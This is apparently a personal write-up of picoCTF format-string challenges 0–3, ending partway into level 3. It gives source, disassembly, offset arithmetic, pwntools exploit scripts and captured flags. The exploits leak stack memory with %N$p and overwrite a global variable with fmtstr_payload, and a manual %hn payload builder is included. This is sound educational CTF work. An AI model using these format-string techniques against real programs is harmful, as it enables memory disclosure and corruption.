format string 0

It’s a 64-bit dynamically linked ELF.

file + checksec + C code

file format-string-0
format-string-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=73480d84a806aebddd86602609fcab2052c8fa13, for GNU/Linux 3.2.0, not stripped

NX is enabled, along with Partial RELRO and the CET features SHSTK and IBT. There is no stack canary and no PIE.

checksec format-string-0
[*] '/home/picoctf/pwn/format_string/format-string-0'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 32
#define FLAGSIZE 64

char flag[FLAGSIZE];

void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);
    fflush(stdout);
    exit(1);
}

int on_menu(char *burger, char *menu[], int count) {
    for (int i = 0; i < count; i++) {
        if (strcmp(burger, menu[i]) == 0)
            return 1;
    }
    return 0;
}

void serve_patrick();

void serve_bob();


int main(int argc, char **argv){
    FILE *f = fopen("flag.txt", "r");
    if (f == NULL) {
        printf("%s %s", "Please create 'flag.txt' in this directory with your",
                        "own debugging flag.\n");
        exit(0);
    }

    fgets(flag, FLAGSIZE, f);
    signal(SIGSEGV, sigsegv_handler);

    gid_t gid = getegid();
    setresgid(gid, gid, gid);

    serve_patrick();
  
    return 0;
}

void serve_patrick() {
    printf("%s %s\n%s\n%s %s\n%s",
            "Welcome to our newly-opened burger place Pico 'n Patty!",
            "Can you help the picky customers find their favorite burger?",
            "Here comes the first customer Patrick who wants a giant bite.",
            "Please choose from the following burgers:",
            "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice1[BUFSIZE];
    scanf("%s", choice1);
    char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
    if (!on_menu(choice1, menu1, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        int count = printf(choice1);
        if (count > 2 * BUFSIZE) {
            serve_bob();
        } else {
            printf("%s\n%s\n",
                    "Patrick is still hungry!",
                    "Try to serve him something of larger size!");
            fflush(stdout);
        }
    }
}

void serve_bob() {
    printf("\n%s %s\n%s %s\n%s %s\n%s",
            "Good job! Patrick is happy!",
            "Now can you serve the second customer?",
            "Sponge Bob wants something outrageous that would break the shop",
            "(better be served quick before the shop owner kicks you out!)",
            "Please choose from the following burgers:",
            "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice2[BUFSIZE];
    scanf("%s", choice2);
    char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
    if (!on_menu(choice2, menu2, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        printf(choice2);
        fflush(stdout);
    }
}

Exploit Explanation

There are two format-string vulnerabilities in the code.

  1. serve_patrick function

It passes choice1, a char array holding user input, to printf as the format string itself.

char choice1[BUFSIZE];
...
int count = printf(choice1);

  2. serve_bob function

It passes choice2, also user input, to printf as the format string.

char choice2[BUFSIZE];
...
printf(choice2);

void serve_patrick() {
    printf("%s %s\n%s\n%s %s\n%s",
            "Welcome to our newly-opened burger place Pico 'n Patty!",
            "Can you help the picky customers find their favorite burger?",
            "Here comes the first customer Patrick who wants a giant bite.",
            "Please choose from the following burgers:",
            "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice1[BUFSIZE];
    scanf("%s", choice1);
    char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
    if (!on_menu(choice1, menu1, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        int count = printf(choice1);
        if (count > 2 * BUFSIZE) {
            serve_bob();
        } else {
            printf("%s\n%s\n",
                    "Patrick is still hungry!",
                    "Try to serve him something of larger size!");
            fflush(stdout);
        }
    }
}

In the serve_patrick function we need to enter "Gr%114d_Cheese", which is a valid menu item.

printf(choice1) then interprets %114d in the input as a conversion specifier and prints an integer (whatever value happens to be in the rsi register) right-aligned in a field 114 characters wide, so the output is mostly padding spaces.

The total number of characters printed is 2 + 114 + 7 = 123, well above 2 * BUFSIZE (64).

As a result the condition count > 2 * BUFSIZE is true and the program calls the serve_bob function.
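
The count can be sanity-checked without running the binary. This is a rough sketch using Python’s %-formatting, which pads %114d the same way C’s printf does. The value 0 is only a stand-in (my assumption) for whatever integer printf actually picks up.

```python
# Stand-in for the unknown integer printf reads from rsi (assumption).
placeholder = 0

BUFSIZE = 32
printed = "Gr%114d_Cheese" % placeholder

# "Gr" (2) + the padded field (114) + "_Cheese" (7)
count = len(printed)
print(count, count > 2 * BUFSIZE)
```

Any int fits inside the 114-character field, so the count doesn’t depend on the placeholder.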

void serve_bob() {
    printf("\n%s %s\n%s %s\n%s %s\n%s",
            "Good job! Patrick is happy!",
            "Now can you serve the second customer?",
            "Sponge Bob wants something outrageous that would break the shop",
            "(better be served quick before the shop owner kicks you out!)",
            "Please choose from the following burgers:",
            "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
            "Enter your recommendation: ");
    fflush(stdout);

    char choice2[BUFSIZE];
    scanf("%s", choice2);
    char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
    if (!on_menu(choice2, menu2, 3)) {
        printf("%s", "There is no such burger yet!\n");
        fflush(stdout);
    } else {
        printf(choice2);
        fflush(stdout);
    }
}

Entering "Cla%sic_Che%s%steak", a valid menu2 item, makes printf process three %s conversions. No arguments were passed, so printf takes whatever is in the argument registers (rsi, rdx, rcx), treats those values as pointers, and tries to dereference them as strings.

If any of those values is not a valid address, the program segfaults.

When a segfault occurs, the sigsegv_handler function registered in main is called and prints the flag.

void sigsegv_handler(int sig) {
    printf("\n%s\n", flag);
    fflush(stdout);
    exit(1);
}
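
To see which menu items hide conversion specifiers, here’s a small sketch that scans them with a regular expression. The pattern is my own simplified approximation of printf’s syntax, not a full parser.

```python
import re

# Simplified pattern for printf conversions: flags, width, precision,
# length modifier, then the conversion character. Not a full parser.
CONVERSION = re.compile(
    r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)

menu = [
    "Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe",
    "Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak",
]

found = {item: CONVERSION.findall(item) for item in menu}
for item, specs in found.items():
    print(f"{item:22} {specs}")
```

Only Cla%sic_Che%s%steak contains %s, the conversion that dereferences a pointer, which is why it’s the one that can crash the program.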

Exploit Code

from pwn import *

r = remote('mimas.picoctf.net', 60519)
r.sendline(b'Gr%114d_Cheese')
r.sendline(b'Cla%sic_Che%s%steak')
r.interactive()

# picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_ef312157}

I wondered what this code in the main function is for.

Extra Knowledge + Further Reading

gid_t gid = getegid();
setresgid(gid, gid, gid);

getegid() returns the effective group ID of the process.

setresgid(gid, gid, gid) sets the real, effective, and saved set-group-ID of the process to that effective group ID.

This pattern shows up a lot in CTF binaries. The challenge binary is typically installed setgid so that it can read flag.txt, and setting all three IDs to the effective GID makes that group permanent for the process, so anything it later spawns (such as a shell we pop) keeps the same group permissions.

Before understanding egid, it’s good to start off with what UID and GID are, and then expand that to the real, effective, and saved IDs.

Honestly, I still don’t quite understand what the saved user ID is for or why it exists.
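
Python exposes the same system calls, so the three group IDs can be inspected directly. This is a minimal sketch for Linux. In an ordinary process that isn’t setgid, the three values already match, so the call changes nothing.

```python
import os

# Real, effective and saved group IDs of the current process.
before = os.getresgid()

# Same call the challenge makes: pin all three to the effective GID.
egid = os.getegid()
os.setresgid(egid, egid, egid)

after = os.getresgid()
print(before, "->", after)
```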

format string 1

file + checksec + C code

file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped

NX is enabled.

checksec format-string-1
[*] '/home/picoctf/pwn/format_string1/format-string-1'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>


int main() {
  char buf[1024];
  char secret1[64];
  char flag[64];
  char secret2[64];

  // Read in first secret menu item
  FILE *fd = fopen("secret-menu-item-1.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-1.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(secret1, 64, fd);
  // Read in the flag
  fd = fopen("flag.txt", "r");
  if (fd == NULL){
    printf("'flag.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(flag, 64, fd);
  // Read in second secret menu item
  fd = fopen("secret-menu-item-2.txt", "r");
  if (fd == NULL){
    printf("'secret-menu-item-2.txt' file not found, aborting.\n");
    return 1;
  }
  fgets(secret2, 64, fd);

  printf("Give me your order and I'll read it back to you:\n");
  fflush(stdout);
  scanf("%1024s", buf);
  printf("Here's your order: ");
  printf(buf);
  printf("\n");
  fflush(stdout);

  printf("Bye!\n");
  fflush(stdout);

  return 0;
}

Exploit Explanation

char buf[1024];
...
scanf("%1024s", buf);
...
printf(buf);

We need to figure out which positional argument (%N$p) leaks the stack slots that hold the flag.

To find that offset, we need to dive into the disassembly.

objdump -M intel -d format-string-1

After sub rsp,0x4d0 the stack pointer rsp equals rbp-0x4d0, and the lea before the second fgets call shows that flag is located at [rbp-0x490].

0x00000000004011f6 <+0>:     endbr64
0x00000000004011fa <+4>:     push   rbp
0x00000000004011fb <+5>:     mov    rbp,rsp
0x00000000004011fe <+8>:     sub    rsp,0x4d0
   ...
0x0000000000401279 <+131>:   mov    rdx,QWORD PTR [rbp-0x8]
0x000000000040127d <+135>:   lea    rax,[rbp-0x490]
0x0000000000401284 <+142>:   mov    esi,0x40
0x0000000000401289 <+147>:   mov    rdi,rax

The distance from rsp to flag is 0x4d0 - 0x490 = 0x40 = 64 bytes.

Each %p prints one 8-byte (64-bit) stack slot, so 64 / 8 = 8.

The flag starts 8 slots above where rsp is pointing.

In the x86-64 calling convention, printf’s first 6 arguments are taken from registers (rdi, rsi, rdx, rcx, r8, r9).

The 7th argument and so on are taken from the stack.

So I computed the offset as 7 (the index of the first stack argument) + 8 (the distance calculated above) = 15.

I initially thought that 15 was the offset that would leak the start of the flag, but it wasn’t.

It was actually 14.

nc mimas.picoctf.net 56575
Give me your order and I'll read it back to you:
%15$p
Here's your order: 0x355f31346d316e34
Bye!

from pwn import *
p64(0x355f31346d316e34) # b'4n1m41_5'

nc mimas.picoctf.net 56575
Give me your order and I'll read it back to you:
%14$p
Here's your order: 0x7b4654436f636970
Bye!

from pwn import *
p64(0x7b4654436f636970) # b'picoCTF{'
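
If pwntools isn’t installed, the same conversion can be done with the standard library. Here’s a minimal stand-in for p64 (my own helper, not the pwntools implementation) that packs the value in little-endian order:

```python
import struct

def p64(value):
    # Pack an unsigned 64-bit integer in little-endian byte order.
    return struct.pack("<Q", value)

print(p64(0x7b4654436f636970))  # b'picoCTF{'
print(p64(0x355f31346d316e34))  # b'4n1m41_5'
```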

So was my calculation bogus? Not really.

It was close, but it was off by one.

The reason is that the format string itself is printf’s first argument and occupies rdi, and it isn’t counted in the %N$ numbering. That leaves only five registers for the numbered arguments: %1$p reads rsi, %2$p rdx, %3$p rcx, %4$p r8 and %5$p r9.

The first stack slot, the one rsp points at when printf is called, is therefore %6$p, not %7$p.

The correct offset is 6 + 8 = 14.
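
The arithmetic can be written down as a tiny helper. It’s a sketch of my own, and it relies on the x86-64 System V convention in which the format string takes rdi, so the first stack slot is positional argument 6.

```python
def first_fmt_offset(rsp_to_target_bytes, slot_size=8, first_stack_index=6):
    """Positional index N such that %N$p reads the slot that sits
    rsp_to_target_bytes above rsp at the time printf is called."""
    if rsp_to_target_bytes % slot_size:
        raise ValueError("target is not aligned to a stack slot")
    return first_stack_index + rsp_to_target_bytes // slot_size

# flag is at rbp-0x490 and rsp is at rbp-0x4d0
offset = first_fmt_offset(0x4d0 - 0x490)
print(offset)  # 14
```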

I still believe it’s better to calculate the offset like this than to send a whole bunch of %ps.

Most of the writeups I found sent a bunch of %ps, but that doesn’t seem like a good approach to me.

One tip: if the calculated offset is N, also check its neighbors, %(N-1)$p and %(N+1)$p.

We now know the starting offset, but is there a way to find where the leak should end?

Yup. Remember that the flag buffer is 64 bytes: char flag[64];.

64 / 8 = 8 slots, so the flag occupies at most %14$p through %21$p and must end before %22$p.
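
Typing the specifiers by hand gets tedious, so here’s a small sketch that builds the payload from the start offset and the buffer size. The helper name is mine.

```python
def leak_payload(start, nbytes, slot_size=8):
    # One %N$p per 8-byte slot, comma-separated so scanf("%s") reads it all.
    nslots = -(-nbytes // slot_size)  # ceiling division
    return ",".join(f"%{i}$p" for i in range(start, start + nslots))

payload = leak_payload(14, 64)
print(payload)
```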

nc mimas.picoctf.net 50538
Give me your order and I'll read it back to you:
%14$p,%15$p,%16$p,%17$p,%18$p,%19$p,%20$p,%21$p 
Here's your order: 0x7b4654436f636970,0x355f31346d316e34,0x3478345f33317937,0x31655f673431665f,0x7d383130386531,0x7,0x7cb9cc0a58d8,0x2300000007
Bye!

If you look carefully at the leaked values, the first four (0x7b4654436f636970, 0x355f31346d316e34, 0x3478345f33317937 and 0x31655f673431665f) have 16 hexadecimal digits, which means each is a full 8 bytes of flag text. The fifth, 0x7d383130386531, has only 14 digits: its top byte is 0x00, the string’s null terminator, right after 0x7d ('}').

The flag is stored in a 64-byte buffer, so it fits in at most eight 8-byte chunks, and here it ends inside the fifth. The values that come after (0x7 and so on) are uninitialized bytes left in the rest of the buffer, not part of the flag.

That means we can ignore everything from %19$p (0x7) onward.

We can send %14$p,%15$p,%16$p,%17$p,%18$p, convert each leaked value to ASCII in little-endian byte order, and join them to get the flag.
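
Instead of eyeballing where the flag ends, the decoding can cut at the first null byte. Here’s a sketch using only the standard library, run against the output captured above:

```python
import struct

# Output copied from the session above.
line = ("0x7b4654436f636970,0x355f31346d316e34,0x3478345f33317937,"
        "0x31655f673431665f,0x7d383130386531,0x7,0x7cb9cc0a58d8,0x2300000007")

raw = b"".join(struct.pack("<Q", int(v, 16)) for v in line.split(","))

# Keep everything up to the first null byte, the end of the C string.
flag = raw.split(b"\x00", 1)[0].decode()
print(flag)
```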

Exploit Code

from pwn import *

r = remote('mimas.picoctf.net', 50538)
r.sendline(b'%14$p,%15$p,%16$p,%17$p,%18$p')
r.recvuntil(b'order: ')
leaks = r.recvline().strip(b'\n').split(b',')
# print(leaks)
flag = b''.join([p64(int(leak, 16)) for leak in leaks])
print(flag) # b'picoCTF{4n1m41_57y13_4x4_f14g_e11e8018}\x00'
r.interactive()

Using gdb

You can do the same thing in gdb. Either way, you have to be comfortable reading disassembly to work out which offset leaks the memory you want.

gef➤  disass main
Dump of assembler code for function main:
   0x00000000004011f6 <+0>:     endbr64
   0x00000000004011fa <+4>:     push   rbp
   0x00000000004011fb <+5>:     mov    rbp,rsp
   0x00000000004011fe <+8>:     sub    rsp,0x4d0
   0x0000000000401205 <+15>:    mov    esi,0x402008
   0x000000000040120a <+20>:    mov    edi,0x40200a
   0x000000000040120f <+25>:    call   0x4010f0 <fopen@plt>
   0x0000000000401214 <+30>:    mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401218 <+34>:    cmp    QWORD PTR [rbp-0x8],0x0
   0x000000000040121d <+39>:    jne    0x401233 <main+61>
   0x000000000040121f <+41>:    mov    edi,0x402028
   0x0000000000401224 <+46>:    call   0x4010b0 <puts@plt>
   0x0000000000401229 <+51>:    mov    eax,0x1
   0x000000000040122e <+56>:    jmp    0x401363 <main+365>
   0x0000000000401233 <+61>:    mov    rdx,QWORD PTR [rbp-0x8]
   0x0000000000401237 <+65>:    lea    rax,[rbp-0x450]
   0x000000000040123e <+72>:    mov    esi,0x40
   0x0000000000401243 <+77>:    mov    rdi,rax
   0x0000000000401246 <+80>:    call   0x4010d0 <fgets@plt>
   0x000000000040124b <+85>:    mov    esi,0x402008
   0x0000000000401250 <+90>:    mov    edi,0x40205b
   0x0000000000401255 <+95>:    call   0x4010f0 <fopen@plt>
   0x000000000040125a <+100>:   mov    QWORD PTR [rbp-0x8],rax
   0x000000000040125e <+104>:   cmp    QWORD PTR [rbp-0x8],0x0
   0x0000000000401263 <+109>:   jne    0x401279 <main+131>
   0x0000000000401265 <+111>:   mov    edi,0x402068
   0x000000000040126a <+116>:   call   0x4010b0 <puts@plt>
   0x000000000040126f <+121>:   mov    eax,0x1
   0x0000000000401274 <+126>:   jmp    0x401363 <main+365>
   0x0000000000401279 <+131>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x000000000040127d <+135>:   lea    rax,[rbp-0x490]
   0x0000000000401284 <+142>:   mov    esi,0x40
   0x0000000000401289 <+147>:   mov    rdi,rax
   0x000000000040128c <+150>:   call   0x4010d0 <fgets@plt>
   0x0000000000401291 <+155>:   mov    esi,0x402008
   0x0000000000401296 <+160>:   mov    edi,0x40208d
   0x000000000040129b <+165>:   call   0x4010f0 <fopen@plt>
   0x00000000004012a0 <+170>:   mov    QWORD PTR [rbp-0x8],rax
   0x00000000004012a4 <+174>:   cmp    QWORD PTR [rbp-0x8],0x0
   0x00000000004012a9 <+179>:   jne    0x4012bf <main+201>
   0x00000000004012ab <+181>:   mov    edi,0x4020a8
   0x00000000004012b0 <+186>:   call   0x4010b0 <puts@plt>
   0x00000000004012b5 <+191>:   mov    eax,0x1
   0x00000000004012ba <+196>:   jmp    0x401363 <main+365>
   0x00000000004012bf <+201>:   mov    rdx,QWORD PTR [rbp-0x8]
   0x00000000004012c3 <+205>:   lea    rax,[rbp-0x4d0]
   0x00000000004012ca <+212>:   mov    esi,0x40
   0x00000000004012cf <+217>:   mov    rdi,rax
   0x00000000004012d2 <+220>:   call   0x4010d0 <fgets@plt>
   0x00000000004012d7 <+225>:   mov    edi,0x4020e0
   0x00000000004012dc <+230>:   call   0x4010b0 <puts@plt>
   0x00000000004012e1 <+235>:   mov    rax,QWORD PTR [rip+0x2d78]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x00000000004012e8 <+242>:   mov    rdi,rax
   0x00000000004012eb <+245>:   call   0x4010e0 <fflush@plt>
   0x00000000004012f0 <+250>:   lea    rax,[rbp-0x410]
   0x00000000004012f7 <+257>:   mov    rsi,rax
   0x00000000004012fa <+260>:   mov    edi,0x402111
   0x00000000004012ff <+265>:   mov    eax,0x0
   0x0000000000401304 <+270>:   call   0x401100 <__isoc99_scanf@plt>
   0x0000000000401309 <+275>:   mov    edi,0x402118
   0x000000000040130e <+280>:   mov    eax,0x0
   0x0000000000401313 <+285>:   call   0x4010c0 <printf@plt>
   0x0000000000401318 <+290>:   lea    rax,[rbp-0x410]
   0x000000000040131f <+297>:   mov    rdi,rax
   0x0000000000401322 <+300>:   mov    eax,0x0
   0x0000000000401327 <+305>:   call   0x4010c0 <printf@plt>
   0x000000000040132c <+310>:   mov    edi,0xa
   0x0000000000401331 <+315>:   call   0x4010a0 <putchar@plt>
   0x0000000000401336 <+320>:   mov    rax,QWORD PTR [rip+0x2d23]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x000000000040133d <+327>:   mov    rdi,rax
   0x0000000000401340 <+330>:   call   0x4010e0 <fflush@plt>
   0x0000000000401345 <+335>:   mov    edi,0x40212c
   0x000000000040134a <+340>:   call   0x4010b0 <puts@plt>
   0x000000000040134f <+345>:   mov    rax,QWORD PTR [rip+0x2d0a]        # 0x404060 <stdout@GLIBC_2.2.5>
   0x0000000000401356 <+352>:   mov    rdi,rax
   0x0000000000401359 <+355>:   call   0x4010e0 <fflush@plt>
   0x000000000040135e <+360>:   mov    eax,0x0
   0x0000000000401363 <+365>:   leave
   0x0000000000401364 <+366>:   ret
End of assembler dump.
gef➤  b *0x000000000040128c
Breakpoint 1 at 0x40128c
gef➤  r
gef➤  ni 
gef➤  telescope
0x00007fffffffd230│+0x0000: 0x0000000000000009 ("\t"?)   ← $rsp
0x00007fffffffd238│+0x0008: 0x0000000000000000
0x00007fffffffd240│+0x0010: 0x0000000000000000
0x00007fffffffd248│+0x0018: 0x00007ffff7ffdab0  →  0x00007ffff7fc5000  →  0x03010102464c457f
0x00007fffffffd250│+0x0020: 0x00007fff3de00ec7
0x00007fffffffd258│+0x0028: 0x00007ffff7ff39d7  →  0x00636f6c6c616572 ("realloc"?)
0x00007fffffffd260│+0x0030: 0x0000000000000004
0x00007fffffffd268│+0x0038: 0x0000000000000000
0x00007fffffffd270│+0x0040: "picoCTF{hwkim301}"  ← $rax, $rcx
0x00007fffffffd278│+0x0048: "hwkim301}"


gef➤  p/d (0x00007fffffffd270-0x00007fffffffd230)/8
$1 = 8

As you can see, we get the same value, 8, as we did using objdump.

This was the hardest problem in the entire picoCTF format-string series.

To be honest, I found all the format-string problems hard. I couldn’t solve any of them during the CTF last year.

I only had a day or two to play because I was in the army and had restricted computer access.

Even with plenty of time, I probably couldn’t have solved it back then though lol.

Unlike for other challenges, I haven’t found any really useful writeups for this one.

format string 2

file + checksec + C Code

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=dfe923d97df1df729249ff21202d10ad15d45f4c, for GNU/Linux 3.2.0, not stripped

The primary security feature that’s enabled is NX.

checksec vuln
[*] '/home/picoctf/pwn/format_string2/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

I wonder what SHSTK and IBT are.

I linked an explanation on SHSTK and IBT for those who are interested, honestly this stuff seems out of my level.

At least it’s good to know the acronyms of what SHSTK and IBT are lol!

#include <stdio.h>

int sus = 0x21737573;

int main() {
  char buf[1024];
  char flag[64];


  printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
  fflush(stdout);
  scanf("%1024s", buf);
  printf("Here's your input: ");
  printf(buf);
  printf("\n");
  fflush(stdout);

  if (sus == 0x67616c66) {
    printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");

    // Read in the flag
    FILE *fd = fopen("flag.txt", "r");
    fgets(flag, 64, fd);

    printf("%s", flag);
    fflush(stdout);
  }
  else {
    printf("sus = 0x%x\n", sus);
    printf("You can do better!\n");
    fflush(stdout);
  }

  return 0;
}

Exploit Explanation

A format string vulnerability exists in the main function.

char buf[1024];
printf(buf);

I sent a bunch of %ps like I did when solving echo_valley.

./vuln 
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
Here's your input: 0x7fff7aca0f10
sus = 0x21737573
You can do better!

Unfortunately, the binary only leaked one value.

This is because it reads input with scanf("%1024s", buf), and the %s conversion stops at the first whitespace character (space, tab, newline, ...).

If we send %p %p %p... it only reads up to the first %p.

The C code for echo_valley, on the other hand, used fgets to read input.

fgets reads the entire line, spaces included, until a newline or until the buffer is full.

That’s why we need to change our format-string input.

We need to make sure it doesn’t contain any whitespace.

So this time I used a dot as the separator: %p.%p.%p.
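
The difference is easy to model. This is only a rough Python imitation of how scanf("%s") tokenizes input, not the real libc behavior in every detail:

```python
def scanf_s(data):
    # Rough model of scanf("%s"): skip leading whitespace,
    # then read up to the next whitespace character.
    parts = data.split()
    return parts[0] if parts else ""

spaced = " ".join(["%p"] * 4)
dotted = ".".join(["%p"] * 4) + "."

print(repr(scanf_s(spaced)))  # '%p'
print(repr(scanf_s(dotted)))  # '%p.%p.%p.%p.'
```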

./vuln 
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
Here's your input: 0x7fff89630670.(nil).(nil).0xa.0x400.0x7f6f063ac860.0x7f6f063e4ab0.(nil).(nil).(nil).0x7f6f063e52e0.0x1a0c23d.0x7f6f063acd78.0x70252e70252e7025.
sus = 0x21737573

You can see that the 14th value is my own format string, read back as ASCII bytes.

0x70252e70252e7025 looks reversed because x86-64 is little-endian.

from pwn import * 
p64(0x70252e70252e7025) # b'%p.%p.%p'
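
Counting the values by eye is error-prone, so here’s a sketch that finds the position automatically in the output captured above. It looks for the first 8 bytes of the input as printf would show them with %p.

```python
import struct

# Output copied from the run above.
leak = ("0x7fff89630670.(nil).(nil).0xa.0x400.0x7f6f063ac860.0x7f6f063e4ab0."
        "(nil).(nil).(nil).0x7f6f063e52e0.0x1a0c23d.0x7f6f063acd78."
        "0x70252e70252e7025.")

# The first 8 bytes of what we typed, as a little-endian integer in hex.
marker = hex(struct.unpack("<Q", b"%p.%p.%p")[0])

values = leak.rstrip(".").split(".")
offset = values.index(marker) + 1  # %N$ numbering starts at 1
print(marker, offset)
```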

Why is it important to find which argument position shows my own input?

Because the 14th argument slot is the start of my input buffer, any address I place inside the input also sits in a known argument slot. A %N$n specifier that references that slot then writes to the target address. (fmtstr_payload puts the addresses after the conversion specifiers, because a 64-bit address contains null bytes that would end the format string early.)

From here, the rest is simple. Use offset 14 to change sus from 0x21737573 to 0x67616c66 and read the flag.
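
For a feel of what such a payload looks like when built by hand, here’s a sketch that writes the value as two 16-bit halves with %hn. It’s my own illustration and I haven’t run it against the remote service. The address of sus below is a hypothetical placeholder, and the layout (text first, addresses last) is just one common choice.

```python
import struct

def two_hn_payload(buf_offset, addr, value):
    """Format string that writes the 32-bit value to addr with two %hn
    writes. buf_offset is the %N$ index where our input starts."""
    # (number of characters to have printed, address to write it to),
    # smaller count first because the printed total can only grow.
    writes = sorted([(value & 0xFFFF, addr), (value >> 16, addr + 2)])

    slots = 1  # 8-byte slots reserved for the text part of the payload
    while True:
        fmt, printed = "", 0
        for i, (count, _) in enumerate(writes):
            if count > printed:
                fmt += f"%1${count - printed}c"  # pad output up to count
            fmt += f"%{buf_offset + slots + i}$hn"
            printed = count
        if len(fmt) <= slots * 8:
            break
        slots += 1

    # Addresses go last: their null bytes would otherwise end the string.
    tail = b"".join(struct.pack("<Q", a) for _, a in writes)
    payload = fmt.ljust(slots * 8, "A").encode() + tail
    if any(b in payload for b in b" \t\n\r\v\f"):
        raise ValueError("payload contains whitespace, scanf would cut it")
    return payload

SUS_ADDR = 0x404060  # hypothetical; take the real one from the ELF symbols
payload = two_hn_payload(14, SUS_ADDR, 0x67616C66)
print(payload)
```

The text part is padded to a multiple of 8 bytes so that the two addresses land exactly on argument slots.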

Exploit Code

from pwn import *

context.arch = "amd64"
r = remote("rhea.picoctf.net", 61331)
e = ELF("./vuln")
payload = fmtstr_payload(14, {e.sym.sus: 0x67616c66})
r.sendline(payload)
r.interactive() 
# picoCTF{f0rm47_57r?_f0rm47_m3m_741fa290}

Reference + Further Reading

Even though I solved the problem with the help of a writeup, I wonder how you would solve it without fmtstr_payload.

Although fmtstr_payload is a very good tool, it’s good practice to solve format string problems manually to prepare for scenarios where it can’t be used.

1. IBT (Indirect Branch Tracking)

2. SHSTK (Shadow Stack)

format string 3

file + checksec + C code

file format-string-3
format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
checksec format-string-3
[*] '/home/picoctf/pwn/format_string3/format-string-3'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x3ff000)
    RUNPATH:    b'.'
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}

The code is pretty simple, it prints the memory address of the setvbuf function in libc.

There’s also a format string vulnerability.

printf(buf);

Running pwninit

In this level picoCTF gave us the libc and ld.

file libc.so.6 
libc.so.6: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib/ld-linux-x86-64.so.2, BuildID[sha1]=8bfe03f6bf9b6a6e2591babd0bbc266837d8f658, for GNU/Linux 4.4.0, stripped
file ld-linux-x86-64.so.2 
ld-linux-x86-64.so.2: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), static-pie linked, BuildID[sha1]=6ebd6e95dffa2afcbdaf7b7c91103b23ecf2b012, stripped

I ran strings to check how the binary and the libc were built.

The binary was compiled with the GCC 11.4.0 that ships with Ubuntu 22.04, and the provided libc is glibc 2.38.

strings format-string-3 | grep GCC
GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0


strings libc.so.6 | grep GNU
GNU C Library (GNU libc) stable release version 2.38.
